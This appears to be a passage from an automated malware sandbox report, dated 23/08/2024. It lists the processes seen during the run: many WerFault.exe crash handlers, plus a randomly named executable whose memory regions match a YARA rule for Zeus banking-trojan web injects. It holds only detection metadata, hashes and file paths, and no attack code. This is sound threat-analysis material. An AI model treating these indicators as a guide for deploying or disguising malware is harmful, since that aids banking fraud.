                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                              Start time:12:47:33
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6216 -ip 6216
                                                                                                                                                                                                              Imagebase:0x740000
                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                              Start time:12:47:33
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6260 -ip 6260
                                                                                                                                                                                                              Imagebase:0x740000
                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                              Start time:12:47:33
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 800
                                                                                                                                                                                                              Imagebase:0x740000
                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                              Start time:12:47:33
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6216 -s 732
                                                                                                                                                                                                              Imagebase:0x740000
                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                              Start time:12:47:33
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"
                                                                                                                                                                                                              Imagebase:0xe10000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000D.00000002.2204024511.0000000000A00000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000D.00000002.2203789493.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                                              Start time:12:47:34
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3496 -ip 3496
                                                                                                                                                                                                              Imagebase:0x740000
                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                              Start time:12:47:34
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 748
                                                                                                                                                                                                              Imagebase:0x740000
                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                              Start time:12:47:35
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"
                                                                                                                                                                                                              Imagebase:0xe10000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000010.00000002.2046984833.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000010.00000002.2047246012.0000000002FE0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                                              Start time:12:47:35
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 7140 -ip 7140
                                                                                                                                                                                                              Imagebase:0x740000
                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                                              Start time:12:47:35
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7140 -s 760
                                                                                                                                                                                                              Imagebase:0x740000
                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                              Start time:12:47:35
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"
                                                                                                                                                                                                              Imagebase:0xe10000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000013.00000002.2052376389.0000000002F20000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000013.00000002.2052202062.0000000002D80000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:20
                                                                                                                                                                                                              Start time:12:47:36
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7124 -ip 7124
                                                                                                                                                                                                              Imagebase:0x740000
                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                                              Start time:12:47:37
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"
                                                                                                                                                                                                              Imagebase:0xe10000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000015.00000002.2052668868.0000000000C20000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000015.00000002.2054528935.0000000002440000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                                              Start time:12:47:37
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7088 -ip 7088
                                                                                                                                                                                                              Imagebase:0x740000
                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:23
                                                                                                                                                                                                              Start time:12:47:37
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"
                                                                                                                                                                                                              Imagebase:0xe10000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000017.00000002.2056609084.0000000000C40000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000017.00000002.2056409914.0000000000B90000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                                              Start time:12:47:37
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 7064 -ip 7064
                                                                                                                                                                                                              Imagebase:0x740000
                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:25
                                                                                                                                                                                                              Start time:12:47:37
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"
                                                                                                                                                                                                              Imagebase:0xe10000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000019.00000002.2061047580.0000000002AB0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000019.00000002.2060118057.0000000001020000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:26
                                                                                                                                                                                                              Start time:12:47:37
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7040 -ip 7040
                                                                                                                                                                                                              Imagebase:0x740000
                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:27
                                                                                                                                                                                                              Start time:12:47:38
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"
                                                                                                                                                                                                              Imagebase:0xe10000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001B.00000002.2072516404.00000000024E0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001B.00000002.2072302801.0000000002340000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:28
                                                                                                                                                                                                              Start time:12:47:38
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 7024 -ip 7024
                                                                                                                                                                                                              Imagebase:0x740000
                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                                              Start time:12:47:38
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"
                                                                                                                                                                                                              Imagebase:0xe10000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001D.00000002.2073597993.00000000032C0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001D.00000002.2072822053.0000000003010000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:30
                                                                                                                                                                                                              Start time:12:47:38
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 7008 -ip 7008
                                                                                                                                                                                                              Imagebase:0x740000
                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:31
                                                                                                                                                                                                              Start time:12:47:38
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"
                                                                                                                                                                                                              Imagebase:0xe10000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001F.00000002.2078765056.00000000008B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001F.00000002.2078570583.0000000000850000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:32
                                                                                                                                                                                                              Start time:12:47:39
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6988 -ip 6988
                                                                                                                                                                                                              Imagebase:0x740000
                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:33
                                                                                                                                                                                                              Start time:12:47:39
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"
                                                                                                                                                                                                              Imagebase:0xe10000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000021.00000002.2080968370.0000000002B40000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000021.00000002.2080530935.0000000002960000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:34
                                                                                                                                                                                                              Start time:12:47:39
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6968 -ip 6968
                                                                                                                                                                                                              Imagebase:0x740000
                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:35
                                                                                                                                                                                                              Start time:12:47:40
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"
                                                                                                                                                                                                              Imagebase:0xe10000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000023.00000002.2083592694.0000000002E90000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000023.00000002.2084784998.0000000003290000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:36
                                                                                                                                                                                                              Start time:12:47:40
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 6944 -ip 6944
                                                                                                                                                                                                              Imagebase:0x740000
                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:37
                                                                                                                                                                                                              Start time:12:47:40
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"
